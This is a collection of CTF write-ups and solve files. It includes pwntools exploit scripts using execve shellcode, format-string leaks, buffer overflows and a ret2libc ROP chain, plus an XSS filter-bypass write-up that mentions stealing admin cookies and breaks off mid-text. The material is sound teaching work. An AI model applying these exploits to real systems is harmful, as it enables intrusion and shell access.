--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/flag:
--------------------------------------------------------------------------------
1 | YAO{Dummy}
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/ld-linux-x86-64.so.2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/ld-linux-x86-64.so.2
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/libc.so.6
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/lucky:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/lucky
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/ynetd
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3.8'
2 |
3 | services:
4 | lucky:
5 | build:
6 | context: ./challenge
7 | ports:
8 | - "8084:8083"
9 | restart: unless-stopped
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/solve.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 | import ctypes
3 | import time
4 |
5 | context.log_level = 'debug'
6 |
7 | # Load the same libc used by the binary
8 | libc = ctypes.CDLL('./challenge/src/libc.so.6')
9 |
10 | # Calculate the current lucky number
11 | current_time = int(time.time())
12 | libc.srand(current_time)
13 | predicted_number = libc.rand() % 1000
14 |
15 | log.info(f"Predicted lucky number: {predicted_number}")
16 |
17 | # Start the process
18 | p = process('./challenge/src/lucky')
19 | # p = remote("127.0.0.1", 8084)
20 |
21 | p.recv()
22 | p.sendline(str(predicted_number).encode())
23 |
24 | shellcode = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05"
25 |
26 |
27 | payload = flat(
28 | shellcode,
29 | 'A' * (72 - len(shellcode)), # Padding to reach the return address
30 | p64(0x000000000040110c) # Address of the jmp rax instruction that will jmp to the shellcode
31 | )
32 |
33 | p.sendline(payload)
34 | p.interactive()
35 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM kalilinux/kali-rolling
2 |
3 | # Create CTF user
4 | RUN useradd -d /home/ctf/ -s /bin/bash ctf
5 | RUN apt-get update
6 |
7 | WORKDIR /home/ctf/
8 |
9 | # Copy files
10 | COPY ./src/Elbareed_Elmasry .
11 | COPY ./src/flag .
12 | COPY ./src/libc.so.6 .
13 | COPY ./src/ld-linux-x86-64.so.2 .
14 | COPY ynetd .
15 |
16 | # Set permissions
17 | RUN chown -R root:root .
18 | RUN chmod 555 Elbareed_Elmasry
19 | RUN chmod 555 libc.so.6
20 | RUN chmod 555 ld-linux-x86-64.so.2
21 | RUN chmod 555 ynetd
22 | RUN chmod 444 ./flag
23 |
24 | USER ctf
25 | EXPOSE 8083
26 | CMD ["./ynetd", "-p", "8083", "./Elbareed_Elmasry"]
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Elbareed_Elmasry_Player.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Elbareed_Elmasry_Player.zip
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Readme.md:
--------------------------------------------------------------------------------
1 | ### Brief
2 |
3 | This is an easy Pwn challenge where the application has some basic features (Register, Login, View Profile and Send Letter)
4 | PIE is enabled but the stack is executable.
5 | There is a format string bug in the view profile function so, the user can leak an address from the stack and calculates the offset between it and the shell code then return to it using the bof bug in the send letter.
6 |
7 |
8 |
9 |
10 | ### Solution Approaches
11 |
12 |
13 | 1. **Leaking the address from the stack**
14 |
15 | Regsiter a user using %p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p to leak some address from the stack (index 6 must be the $rsp value) which is the stack pointer (top of the stack)
16 |
17 |
18 | 2. **Get the shellcode address offset from the leaked address**
19 |
20 | After doing a breakpoint at send_letter function we can determine the address of our input returning from gets.
21 | By calculating the offset between our input address (shellcode) and leaked address (leaked address - shellcode address (the top of the stack) = 0x120)
22 |
23 | ---
24 |
25 | ### Final Exploit
26 |
27 |
28 | 1. Register and login with : "%6$p"
29 | 2. Go to show_profile and get the leaked address then add - 0x120
30 | 3. Put the shellcode then padding the rest of buffer by "A" * (264 - len(shellcode) ) to control the RIP
31 | 4. Put the address of the shellcode
32 | 5. Get a shell
33 |
34 | [Here is the exploit script](./solve.py)
35 |
36 | This script automates the steps described above to exploit the vulnerability and gain a shell.
37 |
38 | 
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/solve.py:
--------------------------------------------------------------------------------
1 |
2 |
3 | from pwn import *
4 |
5 |
6 | context.log_level = 'debug'
7 | context.arch = 'amd64'
8 | BINARY = "./src/elbareed_elmasry"
9 |
10 | if args.LOCAL:
11 | r = process(BINARY)
12 | else:
13 | #r = process(BINARY)
14 | r = remote("localhost", 3400)
15 |
16 | e = ELF(BINARY)
17 | shell_code = asm(shellcraft.amd64.sh())
18 |
19 | # ret = ROP(e).find_gadget(['ret'])[0]
20 |
21 | gdb_script = """
22 | b *send_letter+75
23 | """
24 |
25 | def register():
26 | print("[*] Registering...")
27 | r.sendline("1")
28 | print("[*] Sending username...")
29 | print(r.recv().decode())
30 | r.sendline("%6$p")
31 | # print(r.recv().decode())
32 |
33 | def login():
34 | print("[*] Logging in...")
35 | r.sendline("2")
36 | r.recvuntil(b"Enter username to login:")
37 | r.sendline("%6$p")
38 | # print(r.recv().decode())
39 |
40 | def get_leak():
41 | print("[*] Getting leak...")
42 | r.sendline("3")
43 | profile = r.recv()
44 | print("Profile: ",profile)
45 | stack_leak = int(profile.decode().split("Username: ")[1].split("\n")[0], 16)
46 | shell_code_address = stack_leak - 0x120
47 | return shell_code_address
48 |
49 |
50 |
51 | try:
52 | # gdb.attach(r,gdb_script)
53 | output = r.recvuntil(b"Exit\n>")
54 | print(output.decode())
55 | register()
56 | print(r.recv().decode())
57 | login()
58 | print(r.recv().decode())
59 | leaked_address = get_leak()
60 | r.sendline("4")
61 | print(r.recv().decode())
62 |
63 | payload = flat(shell_code, 'A' * (256 - len(shell_code)), 'B'*8, p64(leaked_address))
64 | r.sendline(payload)
65 | r.interactive()
66 |
67 | except Exception as e:
68 | print(f"[-] Error: {str(e)}")
69 |
70 | finally:
71 | r.close()
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/.gdb_history:
--------------------------------------------------------------------------------
1 | disass show_profile
2 | b *show_profile + 57
3 | r
4 | c
5 | ni
6 | b *show_profile + 102
7 | r
8 | stack
9 | c
10 | stack
11 | c
12 | c
13 | c
14 | stack
15 | stack
16 | search "AAAABBBB"
17 | c
18 | b *show_profile + 102
19 | r
20 | stack
21 | search AAAABBBB
22 | search 0x5555555592f0
23 | search 5555555592f0
24 | b *send_letter
25 | c
26 | ni 5
27 | ni
28 | search CCCC
29 | stack
30 | c
31 | stack
32 | 0x7fffffffdbd0 - 0x7fffffffdcd0
33 | p0x7fffffffdbd0 - 0x7fffffffdcd0
34 | p 0x7fffffffdbd0 - 0x7fffffffdcd0
35 | p 0x7fffffffdbd0 - 0x7fffffffdcd0
36 | p 0x120
37 | c
38 | stack
39 | b *send_letter
40 | b *show_profile + 102
41 | r
42 | stack
43 | c
44 | r
45 | b *show_profile + 102
46 | c
47 | stack
48 | c
49 | b *send_letter
50 | c
51 | ni
52 | stack
53 | vmmap 0x7fffffffdcf0
54 | x/s 0x7fffffffdcf0
55 | p 0x7fffffffdbd0 - 0x7fffffffdcf0
56 | p 0x7fffffffdcf0 - 0x7fffffffdbd0
57 | p/x 0x7fffffffdcf0 - 0x7fffffffdbd0
58 | checksec
59 | x/s 0x7fffffffdcf0
60 | x/s 0x7fffffffdbd0
61 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/Elbareed_Elmasry:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/Elbareed_Elmasry
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/flag:
--------------------------------------------------------------------------------
1 | FLAG{DUMMY}
2 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/ld-linux-x86-64.so.2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/ld-linux-x86-64.so.2
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/libc.so.6
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/ynetd
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/.gdb_history:
--------------------------------------------------------------------------------
1 | c
2 | ni
3 | ni
4 | stack 30
5 | c
6 | ni
7 | ni
8 | c
9 | c
10 | c
11 | c
12 | c
13 | ni
14 | ni
15 | ni
16 | vmmap 0x7ffe54f412e3
17 | c
18 | ni
19 | ni
20 | stack 30
21 | p 0x7ffe968e1a48 - 0x7ffe968e19a0
22 | p 168 / 8
23 | c
24 | p 0x7fced9814206 - 133
25 | p/x 0x7fced9814206 + 133
26 | vmmap 0x7fced981428b
27 | p 0x7fced981428b - 0x7fced97ea000
28 | p/x 0x7fced981428b - 0x7fced97ea000
29 | c
30 | c
31 |
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/chall.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/chall.zip
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/game-of-yap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/game-of-yap
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/game-of-yap_patched:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/game-of-yap_patched
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/ld-2.39.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/ld-2.39.so
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/libc.so.6
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/readme.md:
--------------------------------------------------------------------------------
1 | ## Game of Yap - Pwn Challenge Solver
2 |
3 | **Important Note:** The `libc.so.6` version required for this challenge was not included in the provided challenge files (`chall.zip`). Initially, the exploit worked locally but failed to work remotely. To resolve this, I built a Docker container, extracted the correct `libc` binary from it, patched the binary accordingly, and recalculated the `libc` base address.
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/solve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwn import *
4 |
5 | exe = ELF("./game-of-yap_patched")
6 | libc = ELF("./libc.so.6")
7 | ld = ELF("./ld-2.39.so")
8 |
9 | context.binary = exe
10 |
11 |
12 | def conn():
13 | if args.LOCAL:
14 | r = process([exe.path])
15 | if args.DEBUG:
16 | gdb.attach(r)
17 | else:
18 | r = remote("yap.chal.cyberjousting.com", 1355)
19 |
20 | return r
21 |
22 | mov_rsi_into_rdi = 0x0000000000001243
23 | printf_gadget = 0x1299
24 |
25 | def main():
26 | r = conn()
27 | # gdb.attach(r,"""
28 | # b *play + 42
29 | # c
30 | # """)
31 | r.recvuntil("...\n")
32 |
33 | # First payload to overwrite the last byte of the return addrss (bypass PIE) since the return address included the base address so, we are just changing the last byte to ovewrite the execution to yap function
34 | payload1 = flat(
35 | "A" * 264,
36 | "\x80"
37 | )
38 | r.send(payload1)
39 |
40 | # Yap function leaks the play function address so, we can use it to get the base address of the binary
41 | play_leak = r.recvline().strip().decode()
42 | play_leak = int(play_leak, 16)
43 | exe.address = play_leak - exe.symbols['play']
44 | log.info(f"Base address : {hex(exe.address)}")
45 |
46 | ret_gadget = ROP(exe).find_gadget(["ret"])[0]
47 |
48 |
49 | payload2 = flat(
50 | "B%27$p", # RSI value (index of the libc-related address at stack)
51 | "B" * (264 - 6), # Padding
52 | p64(exe.address + mov_rsi_into_rdi), # Gadget that will copy rsi into rdi
53 | p64(ret_gadget), # Stack allignment
54 | p64(exe.address + printf_gadget), # Call printf gadget
55 | p64(exe.symbols['play']), # RBP
56 | p64(exe.symbols['play']) # Return address to play function to send the libc payload
57 | )
58 | r.send(payload2)
59 |
60 | # Getting the libc-related leaked address and calculate the libc base address
61 | libc_start_main_leak = r.recvuntil("BB").decode()
62 | libc_start_main_leak = libc_start_main_leak.strip().split("B")[1].split("BB")[0]
63 | log.info(f" libc start_main : {hex(int(libc_start_main_leak,16) - 139 )}")
64 | libc.address = int(libc_start_main_leak, 16) - 0x2a28b
65 | log.info(f"libc base : {hex(libc.address)}")
66 |
67 | # Classic ret2libc
68 | libc_ROP = ROP(libc)
69 | bin_sh = next(libc.search("/bin/sh\0"))
70 | pop_rdi_rbp = libc_ROP.find_gadget(["pop rdi"])[0]
71 | pop_rsi_rbx = libc_ROP.find_gadget(["pop rsi"])[0]
72 | pop_rdx = libc_ROP.find_gadget(["pop rdx"])[0]
73 |
74 | payload3 = flat(
75 | "A" * 264,
76 | p64(pop_rdi_rbp),
77 | p64(bin_sh), # RDI value (first argument to system) -> address of /bin/ss
78 | p64(0), # RBP value -> any (Just a gadget side effect)
79 | p64(pop_rsi_rbx),
80 | p64(0), # RSI value (second argument to system) -> 0
81 | "B"*8, # RBX value -> any (Just a gadget side effect)
82 | p64(pop_rdx),
83 | p64(0), # RDX value (third argument to system) -> 0
84 | p64(libc.symbols["system"])
85 |
86 | )
87 | r.send(payload3)
88 |
89 |
90 | # good luck pwning :)
91 | r.interactive()
92 |
93 |
94 | if __name__ == "__main__":
95 | main()
--------------------------------------------------------------------------------
/CAT CTF23/Forensics/Revenge I/Readme.md:
--------------------------------------------------------------------------------
1 | # Hello everyone, this is my writeup for my Ez DFIR challenge " Revenge I " in CAT CTF 23
2 |
3 | 
4 |
5 |
6 | ### Since our target is to get some info (attacker_name & group name) so, let's analyze this xlsx file !
7 |
8 | ### After openning the file we will see one column hold the names of some companies and seems to be the target for this group !
9 |
10 | ### Since the description said there is no osint required so, let's unzip the xlsx file to analyze it .
11 |
12 | ### To get the username of the attacker we need to know the user that created this file by reading this file :
13 |
14 | 
15 |
16 | ### So, our attacker is `Th3-0b3l1sk` #Answer 1
17 |
18 | ### After that we can get the Group name by getting the path that this file has been saved when created by reading this file :
19 |
20 | 
21 |
22 | ### Our flag : CATF{Th3-0b3l1sk_n!NjaTur7l5}
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/CAT CTF23/Web/Xss 3/readme.md:
--------------------------------------------------------------------------------
1 | # Hello everyone, this is my writeup for my web challenge " Xss 3 " that had no solves in JIS CTF 2023 and CAT CTF 23
2 |
3 | 
4 |
5 | ### When we open the link you will find "Enter your name " and after you send it as /?name=ghazy you will get this :
6 |
7 | 
8 |
9 | ### Since we can clearly see our input reflected in the page so, let's try a basic payload like
10 | `
`
11 |
12 | ### And we will got our input as it
13 |
14 | 
15 |
16 | ### Seems filtered right ? so, let's open the html source to see what happened to our payload in the reflection
17 |
18 | 
19 |
20 | ### If u tried to drop some error by sending `name` parameter as an array you will get this error
21 |
22 | 
23 |
24 | ### So, it's become clear now why our payload is filtered !! because our input is being passed to htmlspecialchars php function
25 |
26 | > This function filters the html special chars like : [< , > , ' , " , &] in it's default configuration.
27 |
28 | ### So, this function is safe from bypassing !
29 |
30 | ### But after some hours since no one solved it, i released a hint .
31 |
32 | 
33 |
34 | ### As we see in the response our input is being reflected on a js variable !
35 | ### So, let's see how we can use it to bypass htmlspecialchars
36 |
37 | ### If you opened your browser console and tried this :
38 |
39 | 
40 |
41 | ### As you can see we can write a string by hex escaping using js like any programming / scripting languages !
42 |
43 | ### And since our input will be reflected at the js variable and the js code will print it in the page So, it should work !
44 |
45 | 
46 |
47 |
48 | ### let's try to test it in our challenge
49 |
50 | 
51 |
52 | 
53 |
54 | ### As you can see both of them are filtered !!
55 |
56 | ### Seems like the developer read about them in documents and filtered them and that what makes it a real life case : )
57 |
58 | 
59 |
60 |
61 | ### Then what about using an old escaping that has been deprecated from the js docs : D
62 |
63 | ### Yup it's called Octal escpaing.
64 |
65 | > We can escape octals in strings by just using `\`
66 |
67 | 
68 |
69 |
70 | ### TBH, i got it while i was debugging my challenge i wasn't know it before : D
71 |
72 | ### I wrote a simple for loop to print all chars to figure our what's this escaping and after that i knew it's octal : )
73 |
74 | ### So, let's try to escape our html special chars like : [<,>]
75 |
76 | > Our Payload : \74img src=x onerror=alert()\76
77 |
78 | ### And bingoooo, we got our xss !
79 |
80 | 
81 |
82 |
83 | ### But the problem is we had only 38 chars as a length limit ! So, we can't write a pyload like this to steal the admin cookies:
84 |
85 | ```javascript
86 |
87 |
88 | ```
89 |
90 | ### It's more than 38 chars for sure !
91 |
92 | ### There are many ways to bypass the length limit like : window.open or 13.rs domain : D
93 |
94 | ### We will use window.open
95 |
96 | > In js we can open a new window and control some variables like it's name !
97 |
98 | ### What about trying to eval our window.name that we will control !
99 |
100 | ### Like this
101 |
102 | 
103 |
104 |
105 | ### Since our payload length passed 40 chars so it will not work also : (
106 |
107 | ### So, we need to do it in a smart way : D , like eval without using eval
108 |
109 | ### If anyone searched about tiny xss payloads he will see this
110 |
111 | 
112 |
113 | `